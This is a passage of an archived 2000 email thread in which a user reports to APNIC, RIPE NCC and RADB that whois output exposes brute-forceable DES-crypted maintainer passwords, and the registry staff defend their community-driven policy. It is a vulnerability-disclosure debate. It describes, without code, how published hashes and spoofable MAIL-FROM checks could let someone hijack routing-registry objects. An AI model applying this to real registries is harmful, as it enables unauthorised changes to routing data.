RIPE NCC announced that it was supporting PGP authentication in the RIPE Database (the scheme is also described in RFC-2726). In January 1999, the RIPE NCC published ripe-190, offering free PGP licences on request, to anyone who had a mntner object in the RIPE Database. At every RIPE Meeting since that time, the RIPE NCC has encouraged the RIPE community to adopt PGP authentication. The RIPE NCC does not manage the data in the RIPE Network Management Database. The responsibility for maintaining and protecting the data is with those who put the data in there. However, the RIPE NCC has provided a PGP authentication scheme and encourages its use. You give a one-week deadline before you make a public statement about this. We cannot unilaterly change the functionality of the RIPE Database; we only act on the instructions of the RIPE Database Working Group, which has a mailing list: . We invite you to express your concerns on that list. BTW, this is the first message from you that I have seen. I am investigating if we received any other message from you previous to this one. If you have any more questions, please contact . Kind regards, A. M. R. Magee ______________ RIPE NCC Raju Mathur writes: * -----BEGIN PGP SIGNED MESSAGE----- * Hash: SHA1 * * Hi Bruce, * * I've already sent a copy of this mail to RIPE and RADB. RADB's reply * basically states that ``it's what the users want, so our hands are * tied'', which isn't very heartening. I'm still awating a response * from RIPE. * * While I agree that users (in general) should be given what they want, * I would still not (for example) allow a password-less account as a * Unix system administrator. I have yet to evaluate the extent of * damage that a person with a cracked APNIC, RIPE or RADB password could * do, but I suspect that it could be pretty serious, at least in the * short term. I presume that even if someone manages to change an * object in your database the owner/maintainer of that object would * still be notified and have the option of correcting the issue; however * even a short-term rogue change in the database can have global routing * and security implications (e.g. a change in the in.addr-arpa database * could be the precursor for major security breaches). * * Please allow me to reiterate that the policy of displaying CRYPT-PW * passwords without control is viewed by me personally with great * concern, and I suspect that that is the view most security * professionals also would take. My objective is to have a secure, * stable Internet, and I'm willing to do anything in power to work * towards this goal. If one of those tasks is to bring potential * security holes into the limelight, I shall do that (by posting to * BUGTRAQ and CERT, albeit reluctantly); before that, however, I would * request you again to fix the problem at the source rather than have * half the script-kiddies in the world trying to attack your databases, * and maybe succeeding. * * Regards, * * - -- Raju * * >>>>> "Bruce" == Bruce Campbell via RT writes: * * Bruce> raju@linux-delhi.org wrote (Sat, Nov 25 2000 15:22:36): * >> I see that doing a whois on a maintainer object in your whois * >> database reveals the DES-encrypted password of the maintainer. * >> As you are aware, it is trivial to brute-force crack (decode) a * >> DES password, and this is a serious security hole in your * >> service. Please treat this as a critical issue and refrain * >> from revealing the DES-encrypted password in whois lookups. * * Bruce> The APNIC Whois Databases uses code developed by our sister * Bruce> organisation for Europe (the RIPE NCC) and shares many of * Bruce> the same issues. The issue regarding the visibility of the * Bruce> 'auth' attribute in the maintainer object has been * Bruce> discussed before, however I regret that I am unable to find * Bruce> an online reference for this discussion. * * Bruce> I am cc'ing the appropriate address in the RIPE NCC in the * Bruce> hopes that they can provide a more definitive reference ( a * Bruce> reply to the APNIC ticketing system will also reply to the * Bruce> original requestor ). * * >> I shall be going public with this information in one week. * >> Request you to have fixed the problem by then. * * Bruce> Kind regards, * * Bruce> -- Bruce Campbell * Bruce> +61-7-3367-0490 Systems Administrator Regional Internet * Bruce> Registry Asia Pacific Network Information Centre For the * Bruce> Asia Pacific Region http://www.apnic.net/db/ * Bruce> whois.APNIC.net * * * * Bruce> -------------------------------------------- Managed by * Bruce> Request Tracker * -----BEGIN PGP SIGNATURE----- * Version: GnuPG v1.0.1 (GNU/Linux) * Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard * * iEYEARECAAYFAjoiEKgACgkQyWjQ78xo0X/OewCeO209lBqSTBrlWms8j81Lmxtb * vhoAnjvjbJHfE7QQ4scbd8q3ri5bokPF * =mKDL * -----END PGP SIGNATURE----- * --- Headers Follow --- >From info@apnic.net Wed Nov 29 20:33:24 2000 Received: (from info@localhost) by hadrian.staff.apnic.net (8.9.3/8.9.3) id UAA16430 for technical-ticket; Wed, 29 Nov 2000 20:33:24 +1000 (EST) Received: from guardian.apnic.net (int-gw.staff.apnic.net [192.168.1.254]) by hadrian.staff.apnic.net (8.9.3/8.9.3) with ESMTP id UAA16426 for ; Wed, 29 Nov 2000 20:33:24 +1000 (EST) Received: (from mail@localhost) by guardian.apnic.net (8.9.3/8.9.3) id UAA29609 for ; Wed, 29 Nov 2000 20:33:24 +1000 (EST) Received: from whois1.apnic.net(203.37.255.98) by int-gw.staff.apnic.net via smap (V2.1) id xma029607; Wed, 29 Nov 00 20:33:04 +1000 Received: from birch.ripe.net (birch.ripe.net [193.0.1.96]) by ns.apnic.net (8.9.3/8.9.3) with ESMTP id UAA122202 for ; Wed, 29 Nov 2000 20:33:04 +1000 (EST) Received: from ripe.net (office.ripe.net [193.0.1.97]) by birch.ripe.net (8.8.8/8.8.8) with ESMTP id LAA24135; Wed, 29 Nov 2000 11:31:26 +0100 (CET) Message-Id: <200011291031.LAA24135@birch.ripe.net> To: raju@linux-delhi.org cc: Bruce Campbell via RT , gerald@merit.edu (Gerald Andrew Winters), db-admin@radb.net, irrd-team@merit.edu Subject: Re: [APNIC #62050] (technical) Crypted passwords for maintainer objects In-reply-to: Your message of Mon, 27 Nov 2000 13:17:01 +0530. <14882.4469.52414.25633@localhost.localdomain> References: <14882.4469.52414.25633@localhost.localdomain> From: RIPE Database Administration X-Organization: RIPE Network Coordination Centre X-Phone: +31 20 535 4444 X-Fax: +31 20 535 4445 Date: Wed, 29 Nov 2000 11:31:25 +0100 Sender: ripe-dbm@ripe.net -------------------------------------------- Managed by Request Tracker From gerald@merit.edu Wed Nov 29 22:33:18 2000 X-VM-v5-Data: ([nil nil nil nil nil nil nil nil nil] ["3278" "Wednesday" "29" "November" "2000" "10:14:07" "-0500" "Gerald Andrew Winters" "gerald@merit.edu" nil "76" "Re: [APNIC #62050] (technical) Crypted passwords for maintainer objects" "^From:" nil nil "11" nil nil (number " " mark " Gerald Andrew Win Nov 29 76/3278 " thread-indent "\"Re: [APNIC #62050] (technical) Crypted passwords for maintainer objects\"\n") nil nil] nil) Return-Path: Received: from localhost (IDENT:raju@localhost [127.0.0.1]) by ganwaar.com (8.9.3/8.9.3) with ESMTP id WAA01607 for ; Wed, 29 Nov 2000 22:33:08 +0530 X-POP3-Rcpt: raju@linux-delhi.org Received: from linux-delhi.org by localhost with POP3 (fetchmail-5.3.1) for raju@localhost (single-drop); Wed, 29 Nov 2000 22:33:09 +0530 (IST) Received: from backin5.merit.edu (backin5.merit.edu [198.108.60.28]) by biznetindia.com (8.10.2/8.10.2) with ESMTP id eATFEIm19605 for ; Wed, 29 Nov 2000 10:14:18 -0500 Received: by backin5.merit.edu (Postfix, from userid 8975) id 312587E503; Wed, 29 Nov 2000 10:14:07 -0500 (EST) In-Reply-To: <14882.4469.52414.25633@localhost.localdomain> from "Raju Mathur" at Nov 27, 2000 01:17:01 PM X-Mailer: ELM [version 2.5 PL2] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20001129151407.312587E503@backin5.merit.edu> From: gerald@merit.edu (Gerald Andrew Winters) To: raju@linux-delhi.org Cc: technical@apnic.net (Bruce Campbell via RT), ripe-dbm@ripe.net, gerald@merit.edu (Gerald Andrew Winters), db-admin@radb.net, irrd-team@merit.edu Subject: Re: [APNIC #62050] (technical) Crypted passwords for maintainer objects Date: Wed, 29 Nov 2000 10:14:07 -0500 (EST) Status: RO Raju, > I've already sent a copy of this mail to RIPE and RADB. RADB's reply > basically states that ``it's what the users want, so our hands are > tied'', which isn't very heartening. I'm still awating a response > from RIPE. Your characterization of my comments is true. However, I had much more to say. I will forward my original response after this email so that others can draw their own conclusions. > While I agree that users (in general) should be given what they want, > I would still not (for example) allow a password-less account as a > Unix system administrator. This is an unfair analogy. The relationship between a Unix sysadmin and his network is very much different between and entire community of users and the registries. A sysadmin simply su's and makes whatever changes are desired. In contrast, changes to the technology used at the registries come about from the open standards process. This means changes take place at a slower pace through the meetings and with appoval from the entire community. The reason for this is to avoid dictatorship and general anarachy. The price for this is a slower migration path for changes. > I have yet to evaluate the extent of > damage that a person with a cracked APNIC, RIPE or RADB password could > do, but I suspect that it could be pretty serious, at least in the > short term. Very true. > Please allow me to reiterate that the policy of displaying CRYPT-PW > passwords without control is viewed by me personally with great > concern, and I suspect that that is the view most security > professionals also would take. > My objective is to have a secure, > stable Internet, and I'm willing to do anything in power to work > towards this goal. If one of those tasks is to bring potential > security holes into the limelight, Very true. However, your remark is akin to me making an Internet announcement something like, "SNMP v1 community strings are transmitted in cleartext. This is terrible! You have 1 week to fix it and then I'm going public." It's old news. We all know it and dislike it as much as you. And what about "MAIL-FROM" authentication? You do not include this in your remarks. Certainly your observations would be more potent by adding "MAIL-FROM". Have you read RFC 2726? Do you realize that all users can use this form of authentication? > I shall do that (by posting to > BUGTRAQ and CERT, albeit reluctantly); before that, however, I would > request you again to fix the problem at the source rather than have > half the script-kiddies in the world trying to attack your databases, > and maybe succeeding. The registries will not unilaterally go into the database's and change data or implement new sercurity features without the approval of the community. What you are suggesting won't work anyway (ie, you still have the "MAIL-FROM" problem). We are all sympathatic to your criticism. In fact the RIPE NCC and myself have gotten up numerous times at public forums (ripe, ietf, ...) and urged the public to convert to PGP authentication. The registries agree with you but real change must come from the community. I would suggest to you to come to the meetings and make your proposal. I'm sure you will have *many* supporters. --Gerald Winters From technical@apnic.net Wed Nov 29 22:33:37 2000 X-VM-v5-Data: ([nil nil nil nil nil nil nil nil nil] ["5024" "Thursday" "30" "November" "2000" "01:14:38" "+1000" "(Gerald Andrew Winters) via RT" "technical@apnic.net" nil "112" "[APNIC #62050] (technical) Crypted passwords for maintainer objects" "^From:" nil nil "11" nil nil (number " " mark " (Gerald Andrew Wi Nov 30 112/5024 " thread-indent "\"[APNIC #62050] (technical) Crypted passwords for maintainer objects\"\n") nil nil] nil) Return-Path: Received: from localhost (IDENT:raju@localhost [127.0.0.1]) by ganwaar.com (8.9.3/8.9.3) with ESMTP id WAA01626 for ; Wed, 29 Nov 2000 22:33:27 +0530 X-POP3-Rcpt: raju@linux-delhi.org Received: from linux-delhi.org by localhost with POP3 (fetchmail-5.3.1) for raju@localhost (single-drop); Wed, 29 Nov 2000 22:33:27 +0530 (IST) Received: from guardian.apnic.net (guardian.apnic.net [203.37.255.100]) by biznetindia.com (8.10.2/8.10.2) with ESMTP id eATFFBm19769 for ; Wed, 29 Nov 2000 10:15:11 -0500 Received: (from mail@localhost) by guardian.apnic.net (8.9.3/8.9.3) id BAA01407 for ; Thu, 30 Nov 2000 01:15:06 +1000 (EST) Received: from hadrian.staff.apnic.net(192.168.1.1) by int-gw.staff.apnic.net via smap (V2.1) id xma001394; Thu, 30 Nov 00 01:14:38 +1000 Received: (from daemon@localhost) by hadrian.staff.apnic.net (8.9.3/8.9.3) id BAA20676; Thu, 30 Nov 2000 01:14:38 +1000 (EST) Message-Id: <200011291514.BAA20676@hadrian.staff.apnic.net> Reply-To: (Gerald Andrew Winters) via RT X-Request-ID: 62050 X-RT-Loop-Prevention: APNIC X-Sender: gerald@merit.edu X-Managed-By: Request Tracker 1.0.1 (http://www.fsck.com/projects/rt) Precedence: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii From: (Gerald Andrew Winters) via RT To: raju@linux-delhi.org Cc: Subject: [APNIC #62050] (technical) Crypted passwords for maintainer objects Date: Thu, 30 Nov 2000 01:14:38 +1000 (EST) Status: RO Raju, > I've already sent a copy of this mail to RIPE and RADB. RADB's reply > basically states that ``it's what the users want, so our hands are > tied'', which isn't very heartening. I'm still awating a response > from RIPE. Your characterization of my comments is true. However, I had much more to say. I will forward my original response after this email so that others can draw their own conclusions. > While I agree that users (in general) should be given what they want, > I would still not (for example) allow a password-less account as a > Unix system administrator. This is an unfair analogy. The relationship between a Unix sysadmin and his network is very much different between and entire community of users and the registries. A sysadmin simply su's and makes whatever changes are desired. In contrast, changes to the technology used at the registries come about from the open standards process. This means changes take place at a slower pace through the meetings and with appoval from the entire community. The reason for this is to avoid dictatorship and general anarachy. The price for this is a slower migration path for changes. > I have yet to evaluate the extent of > damage that a person with a cracked APNIC, RIPE or RADB password could > do, but I suspect that it could be pretty serious, at least in the > short term. Very true. > Please allow me to reiterate that the policy of displaying CRYPT-PW > passwords without control is viewed by me personally with great > concern, and I suspect that that is the view most security > professionals also would take. > My objective is to have a secure, > stable Internet, and I'm willing to do anything in power to work > towards this goal. If one of those tasks is to bring potential > security holes into the limelight, Very true. However, your remark is akin to me making an Internet announcement something like, "SNMP v1 community strings are transmitted in cleartext. This is terrible! You have 1 week to fix it and then I'm going public." It's old news. We all know it and dislike it as much as you. And what about "MAIL-FROM" authentication? You do not include this in your remarks. Certainly your observations would be more potent by adding "MAIL-FROM". Have you read RFC 2726? Do you realize that all users can use this form of authentication? > I shall do that (by posting to > BUGTRAQ and CERT, albeit reluctantly); before that, however, I would > request you again to fix the problem at the source rather than have > half the script-kiddies in the world trying to attack your databases, > and maybe succeeding. The registries will not unilaterally go into the database's and change data or implement new sercurity features without the approval of the community. What you are suggesting won't work anyway (ie, you still have the "MAIL-FROM" problem). We are all sympathatic to your criticism. In fact the RIPE NCC and myself have gotten up numerous times at public forums (ripe, ietf, ...) and urged the public to convert to PGP authentication. The registries agree with you but real change must come from the community. I would suggest to you to come to the meetings and make your proposal. I'm sure you will have *many* supporters. --Gerald Winters --- Headers Follow --- >From info@apnic.net Thu Nov 30 01:14:36 2000 Received: (from info@localhost) by hadrian.staff.apnic.net (8.9.3/8.9.3) id BAA20671 for technical-ticket; Thu, 30 Nov 2000 01:14:36 +1000 (EST) Received: from guardian.apnic.net (int-gw.staff.apnic.net [192.168.1.254]) by hadrian.staff.apnic.net (8.9.3/8.9.3) with ESMTP id BAA20667 for ; Thu, 30 Nov 2000 01:14:36 +1000 (EST) Received: (from mail@localhost) by guardian.apnic.net (8.9.3/8.9.3) id BAA01391 for ; Thu, 30 Nov 2000 01:14:36 +1000 (EST) Received: from whois1.apnic.net(203.37.255.98) by int-gw.staff.apnic.net via smap (V2.1) id xma001389; Thu, 30 Nov 00 01:14:11 +1000 Received: from backin5.merit.edu (backin5.merit.edu [198.108.60.28]) by ns.apnic.net (8.9.3/8.9.3) with ESMTP id BAA95119 for ; Thu, 30 Nov 2000 01:14:12 +1000 (EST) Received: by backin5.merit.edu (Postfix, from userid 8975) id 312587E503; Wed, 29 Nov 2000 10:14:07 -0500 (EST) Subject: Re: [APNIC #62050] (technical) Crypted passwords for maintainer objects To: raju@linux-delhi.org Date: Wed, 29 Nov 2000 10:14:07 -0500 (EST) Cc: technical@apnic.net (Bruce Campbell via RT), ripe-dbm@ripe.net, gerald@merit.edu (Gerald Andrew Winters), db-admin@radb.net, irrd-team@merit.edu In-Reply-To: <14882.4469.52414.25633@localhost.localdomain> from "Raju Mathur" at Nov 27, 2000 01:17:01 PM X-Mailer: ELM [version 2.5 PL2] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20001129151407.312587E503@backin5.merit.edu> From: gerald@merit.edu (Gerald Andrew Winters) -------------------------------------------- Managed by Request Tracker From gerald@merit.edu Wed Nov 29 22:34:03 2000 X-VM-v5-Data: ([nil nil nil nil nil nil nil nil nil] ["3765" "Wednesday" "29" "November" "2000" "10:20:06" "-0500" "Gerald Andrew Winters" "gerald@merit.edu" nil "94" "Re: [RADB #15112] Crypted passwords for maintainer objects (fwd)" "^From:" nil nil "11" nil nil (number " " mark " Gerald Andrew Win Nov 29 94/3765 " thread-indent "\"Re: [RADB #15112] Crypted passwords for maintainer objects (fwd)\"\n") nil nil] nil) Return-Path: Received: from localhost (IDENT:raju@localhost [127.0.0.1]) by ganwaar.com (8.9.3/8.9.3) with ESMTP id WAA01639 for ; Wed, 29 Nov 2000 22:33:57 +0530 X-POP3-Rcpt: raju@linux-delhi.org Received: from linux-delhi.org by localhost with POP3 (fetchmail-5.3.1) for raju@localhost (single-drop); Wed, 29 Nov 2000 22:33:57 +0530 (IST) Received: from backin5.merit.edu (backin5.merit.edu [198.108.60.28]) by biznetindia.com (8.10.2/8.10.2) with ESMTP id eATFK6m20812 for ; Wed, 29 Nov 2000 10:20:07 -0500 Received: by backin5.merit.edu (Postfix, from userid 8975) id 50D447E502; Wed, 29 Nov 2000 10:20:06 -0500 (EST) X-Mailer: ELM [version 2.5 PL2] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20001129152006.50D447E502@backin5.merit.edu> From: gerald@merit.edu (Gerald Andrew Winters) To: raju@linux-delhi.org Cc: technical@apnic.net, ripe-dbm@ripe.net, irrd-team@merit.edu Subject: Re: [RADB #15112] Crypted passwords for maintainer objects (fwd) Date: Wed, 29 Nov 2000 10:20:06 -0500 (EST) Status: RO >From gerald@merit.edu Sun Nov 26 13:59:30 2000 Return-Path: Delivered-To: gerald@home.merit.edu Received: from segue.merit.edu (segue.merit.edu [198.108.1.41]) by backin5.merit.edu (Postfix) with ESMTP id C5D547E54D for ; Sun, 26 Nov 2000 13:59:30 -0500 (EST) Received: by segue.merit.edu (Postfix) id 87B8F5DDD1; Sun, 26 Nov 2000 13:59:29 -0500 (EST) Delivered-To: gerald@merit.edu Received: from backin5.merit.edu (backin5.merit.edu [198.108.60.28]) by segue.merit.edu (Postfix) with ESMTP id 66F835DD97 for ; Sun, 26 Nov 2000 13:59:29 -0500 (EST) Received: by backin5.merit.edu (Postfix) id 21E217E549; Sun, 26 Nov 2000 13:59:29 -0500 (EST) Delivered-To: irrd-team@merit.edu Received: by backin5.merit.edu (Postfix, from userid 8975) id C7F8E7E540; Sun, 26 Nov 2000 13:59:28 -0500 (EST) Subject: Re: [RADB #15112] Crypted passwords for maintainer objects To: raju@linux-delhi.org Date: Sun, 26 Nov 2000 13:59:28 -0500 (EST) Cc: db-admin@radb.net, irrd-team@merit.edu In-Reply-To: <14879.34070.278516.159670@localhost.localdomain> from "Raju Mathur" at Nov 25, 2000 02:53:34 PM X-Mailer: ELM [version 2.5 PL2] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20001126185928.C7F8E7E540@backin5.merit.edu> From: gerald@merit.edu (Gerald Andrew Winters) Hello Raju, Thank you for your comments. We obviously do not want security loopholes and appreciate your feedback. However, showing the DES-encrypted password in the maintainer was a decision made by the internet community and is not a local decision by us. (Please see ripe-120.ps for details at www.ripe.net). The important fact is this is a community based decision. People can use whatever level of security they wish. You can have no authentication to PGP authentication (see www.radb.net for details). We actively solicit the community to use PGP authentication as it is very easy now to register your pgp key in the registry. However, the level of authentication is an individual decision and we cannot force anyone in this regard. I'm sure you've also noticed that "MAIL-FROM" is a very common form of authentication currently in use. I think it is easier to fake a 'mail from' header than to decode a DES password. So there is much room for improvement in regrads to registry authentication. All is not as bad as it may seem. More and more users are switching to pgp authentication and by early summer we intend to have RFC 2725 implemented in our registry software which addresses many security problems. Thank you for the advance notice in regards to giving us a week to fix this problem. However, you are welcome to notify the community about this whenever you wish. --Gerald Winters > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Hi, > > I see that doing a whois on a maintainer object in your whois database > reveals the DES-encrypted password of the maintainer if s/he is using > password as his/her authentication scheme. As you are aware, it is > trivial to brute-force crack (decode) a DES password, and this is a > serious security hole in your service. Please treat this as a > critical issue and refrain from revealing the DES-encrypted password > in whois lookups. > > I shall be going public with this information in one week. Request > you to have fixed the problem by then. > > Regards, > > - -- Raju Mathur > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.1 (GNU/Linux) > Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard > > iEYEARECAAYFAjofhQsACgkQyWjQ78xo0X/ypQCfS4NkeuyRMD9Qshx743dgVt1z > FmMAn3e/ahXFjLVuVGu02KvkdHjDx/kK > =SPnT > -----END PGP SIGNATURE----- > > From ripe-dbm@ripe.net Sat Dec 2 09:02:13 2000 X-VM-v5-Data: ([nil nil nil nil nil nil nil nil nil] ["17846" "Friday" "1" "December" "2000" "18:39:00" "+0100" "RIPE Database Administration" "ripe-dbm@ripe.net" nil "394" "Re: [APNIC #62050] (technical) Crypted passwords for maintainer objects " "^From:" nil nil "12" nil nil (number " " mark " RIPE Database Adm Dec 1 394/17846 " thread-indent "\"Re: [APNIC #62050] (technical) Crypted passwords for maintainer objects \"\n") nil nil] nil) Return-Path: Received: from localhost (IDENT:raju@localhost [127.0.0.1]) by ganwaar.com (8.9.3/8.9.3) with ESMTP id JAA03715 for ; Sat, 2 Dec 2000 09:02:08 +0530 X-POP3-Rcpt: raju@linux-delhi.org Received: from linux-delhi.org by localhost with POP3 (fetchmail-5.3.1) for raju@localhost (single-drop); Sat, 02 Dec 2000 09:02:08 +0530 (IST) Received: from birch.ripe.net (birch.ripe.net [193.0.1.96]) by biznetindia.com (8.10.2/8.10.2) with ESMTP id eB1Hd6328772 for ; Fri, 1 Dec 2000 12:39:06 -0500 Received: from ripe.net (office.ripe.net [193.0.1.97]) by birch.ripe.net (8.8.8/8.8.8) with ESMTP id SAA10340; Fri, 1 Dec 2000 18:39:00 +0100 (CET) Message-Id: <200012011739.SAA10340@birch.ripe.net> In-reply-to: Your message of Thu, 30 Nov 2000 11:00:19 +0530. <14885.58859.501931.193491@localhost.localdomain> References: <14885.58859.501931.193491@localhost.localdomain> X-Organization: RIPE Network Coordination Centre X-Phone: +31 20 535 4444 X-Fax: +31 20 535 4445 From: RIPE Database Administration Sender: ripe-dbm@ripe.net To: raju@linux-delhi.org cc: technical@apnic.net (Bruce Campbell via RT), db-admin@radb.net, irrd-team@merit.edu, gerald@merit.edu (Gerald Andrew Winters) Subject: Re: [APNIC #62050] (technical) Crypted passwords for maintainer objects Date: Fri, 01 Dec 2000 18:39:00 +0100 Status: RO Dear Raju Mathur, Raju Mathur writes: * [Munging two messages into one reply to keep everyone in sync] * * Hi Gerald, Mr/Ms Magee, * * Calculate cost of 1% of maintainer objects in the databases getting * perverted using a script like the attached one. Weigh against cost of * public outcry if you unilaterally decide to not reveal auth schemes in * whois lookups. Decide which is cheaper. * * I'm not going public with the script until either a deadline for * changing the whois behaviour determined by you passes, or you decide * not to make such a deadline. In January 1999, RIPE NCC deployed a PGP scheme for authenticating updates in the RIPE Database and the RIPE NCC encouraged the RIPE community to use it and continues to do so. The RIPE NCC can only change the functionality of the RIPE Database on the request of the RIPE Database Working Group, which has a well-defined procedure for discussing proposed changes. Its mailing list is and you are most welcome to express your concerns on that list and/or at a RIPE meeting. The next meeting is in January 2001, in Amsterdam, the Netherlands. If you have anymore questions, please contact . Regards, A. M. R. Magee ______________ RIPE NCC > * * Regards, * * -- Raju * * >>>>> "RIPE" == RIPE Database Administration via RT wr * ites: * * RIPE> Dear Raju Mathur, This matter was originally raised in * RIPE> October 1994, when the RIPE document ripe-120 * RIPE> (ftp://ftp.ripe.net/ripe/docs/ripe-120.txt) was published: * * RIPE> "It is by no means meant to keep out a determined malicious * RIPE> attacker. The crypt function is vulnerable to exhaustive * RIPE> search by (lots of) fast machines and programs to do the * RIPE> searching are widely available. For this reason it is * RIPE> strongly discouraged to use encrypted passwords also used * RIPE> for other purposes such as Unix login accounts in this * RIPE> scheme. As you are publishing the encrypted password in the * RIPE> database it is open to attack." * * RIPE> This was re-stated in ripe-153 (published in January 1997) * RIPE> and in ripe-157 (published in May 1997). In November 1998, * RIPE> ripe-189 was published, in which the RIPE NCC announced that * RIPE> it was supporting PGP authentication in the RIPE Database * RIPE> (the scheme is also described in RFC-2726). In January * RIPE> 1999, the RIPE NCC published ripe-190, offering free PGP * RIPE> licences on request, to anyone who had a mntner object in * RIPE> the RIPE Database. At every RIPE Meeting since that time, * RIPE> the RIPE NCC has encouraged the RIPE community to adopt PGP * RIPE> authentication. * * RIPE> The RIPE NCC does not manage the data in the RIPE Network * RIPE> Management Database. The responsibility for maintaining and * RIPE> protecting the data is with those who put the data in there. * RIPE> However, the RIPE NCC has provided a PGP authentication * RIPE> scheme and encourages its use. * * RIPE> You give a one-week deadline before you make a public * RIPE> statement about this. We cannot unilaterly change the * RIPE> functionality of the RIPE Database; we only act on the * RIPE> instructions of the RIPE Database Working Group, which has a * RIPE> mailing list: . We invite you to express * RIPE> your concerns on that list. * * RIPE> BTW, this is the first message from you that I have seen. I * RIPE> am investigating if we received any other message from you * RIPE> previous to this one. * * RIPE> If you have any more questions, please contact * RIPE> . * * RIPE> Kind regards, * * RIPE> A. M. R. Magee ______________ RIPE NCC * * * RIPE> Raju Mathur writes: * -----BEGIN PGP * RIPE> SIGNED MESSAGE----- * Hash: SHA1 * * Hi Bruce, * * I've * RIPE> already sent a copy of this mail to RIPE and RADB. RADB's * RIPE> reply * basically states that ``it's what the users want, so * RIPE> our hands are * tied'', which isn't very heartening. I'm * RIPE> still awating a response * from RIPE. * * While I agree * RIPE> that users (in general) should be given what they want, * I * RIPE> would still not (for example) allow a password-less account * RIPE> as a * Unix system administrator. I have yet to evaluate * RIPE> the extent of * damage that a person with a cracked APNIC, * RIPE> RIPE or RADB password could * do, but I suspect that it * RIPE> could be pretty serious, at least in the * short term. I * RIPE> presume that even if someone manages to change an * object * RIPE> in your database the owner/maintainer of that object would * * RIPE> still be notified and have the option of correcting the * RIPE> issue; however * even a short-term rogue change in the * RIPE> database can have global routing * and security implications * RIPE> (e.g. a change in the in.addr-arpa database * could be the * RIPE> precursor for major security breaches). * * Please allow me * RIPE> to reiterate that the policy of displaying CRYPT-PW * * RIPE> passwords without control is viewed by me personally with * RIPE> great * concern, and I suspect that that is the view most * RIPE> security * professionals also would take. My objective is * RIPE> to have a secure, * stable Internet, and I'm willing to do * RIPE> anything in power to work * towards this goal. If one of * RIPE> those tasks is to bring potential * security holes into the * RIPE> limelight, I shall do that (by posting to * BUGTRAQ and * RIPE> CERT, albeit reluctantly); before that, however, I would * * RIPE> request you again to fix the problem at the source rather * RIPE> than have * half the script-kiddies in the world trying to * RIPE> attack your databases, * and maybe succeeding. * * Regards, * RIPE> * * - -- Raju * * >>>>> "Bruce" == Bruce Campbell via RT * RIPE> writes: * * Bruce> * RIPE> raju@linux-delhi.org wrote (Sat, Nov 25 2000 15:22:36): * >> * RIPE> I see that doing a whois on a maintainer object in your * RIPE> whois * >> database reveals the DES-encrypted password of * RIPE> the maintainer. * >> As you are aware, it is trivial to * RIPE> brute-force crack (decode) a * >> DES password, and this is * RIPE> a serious security hole in your * >> service. Please treat * RIPE> this as a critical issue and refrain * >> from revealing the * RIPE> DES-encrypted password in whois lookups. * * Bruce> The * RIPE> APNIC Whois Databases uses code developed by our sister * * RIPE> Bruce> organisation for Europe (the RIPE NCC) and shares * RIPE> many of * Bruce> the same issues. The issue regarding the * RIPE> visibility of the * Bruce> 'auth' attribute in the * RIPE> maintainer object has been * Bruce> discussed before, * RIPE> however I regret that I am unable to find * Bruce> an online * RIPE> reference for this discussion. * * Bruce> I am cc'ing the * RIPE> appropriate address in the RIPE NCC in the * Bruce> hopes * RIPE> that they can provide a more definitive reference ( a * * RIPE> Bruce> reply to the APNIC ticketing system will also reply * RIPE> to the * Bruce> original requestor ). * * >> I shall be * RIPE> going public with this information in one week. * >> * RIPE> Request you to have fixed the problem by then. * * Bruce> * RIPE> Kind regards, * * Bruce> -- Bruce Campbell * RIPE> * Bruce> +61-7-3367-0490 Systems * RIPE> Administrator Regional Internet * Bruce> Registry Asia * RIPE> Pacific Network Information Centre For the * Bruce> Asia * RIPE> Pacific Region http://www.apnic.net/db/ * Bruce> * RIPE> whois.APNIC.net * * * * Bruce> * RIPE> -------------------------------------------- Managed by * * RIPE> Bruce> Request Tracker * -----BEGIN PGP SIGNATURE----- * * RIPE> Version: GnuPG v1.0.1 (GNU/Linux) * Comment: Processed by * RIPE> Mailcrypt 3.5.5 and Gnu Privacy Guard g.org/> * * * RIPE> iEYEARECAAYFAjoiEKgACgkQyWjQ78xo0X/OewCeO209lBqSTBrlWms8j81Lmxtb * RIPE> * vhoAnjvjbJHfE7QQ4scbd8q3ri5bokPF * =mKDL * -----END PGP * RIPE> SIGNATURE----- * * * * RIPE> --- Headers Follow --- * * >> From info@apnic.net Wed Nov 29 20:33:24 2000 * RIPE> Received: (from info@localhost) by hadrian.staff.apnic.net * RIPE> (8.9.3/8.9.3) id UAA16430 for technical-ticket; Wed, 29 Nov * RIPE> 2000 20:33:24 +1000 (EST) Received: from guardian.apnic.net * RIPE> (int-gw.staff.apnic.net [192.168.1.254]) by * RIPE> hadrian.staff.apnic.net (8.9.3/8.9.3) with ESMTP id UAA16426 * RIPE> for ; Wed, 29 Nov 2000 20:33:24 * RIPE> +1000 (EST) Received: (from mail@localhost) by * RIPE> guardian.apnic.net (8.9.3/8.9.3) id UAA29609 for * RIPE> ; Wed, 29 Nov 2000 20:33:24 +1000 * RIPE> (EST) Received: from whois1.apnic.net(203.37.255.98) by * RIPE> int-gw.staff.apnic.net via smap (V2.1) id xma029607; Wed, 29 * RIPE> Nov 00 20:33:04 +1000 Received: from birch.ripe.net * RIPE> (birch.ripe.net [193.0.1.96]) by ns.apnic.net (8.9.3/8.9.3) * RIPE> with ESMTP id UAA122202 for ; Wed, 29 * RIPE> Nov 2000 20:33:04 +1000 (EST) Received: from ripe.net * RIPE> (office.ripe.net [193.0.1.97]) by birch.ripe.net * RIPE> (8.8.8/8.8.8) with ESMTP id LAA24135; Wed, 29 Nov 2000 * RIPE> 11:31:26 +0100 (CET) Message-Id: * RIPE> <200011291031.LAA24135@birch.ripe.net> To: * RIPE> raju@linux-delhi.org cc: Bruce Campbell via RT * RIPE> , gerald@merit.edu (Gerald Andrew * RIPE> Winters), db-admin@radb.net, irrd-team@merit.edu Subject: * RIPE> Re: [APNIC #62050] (technical) Crypted passwords for * RIPE> maintainer objects In-reply-to: Your message of Mon, 27 Nov * RIPE> 2000 13:17:01 +0530. * RIPE> <14882.4469.52414.25633@localhost.localdomain> References: * RIPE> 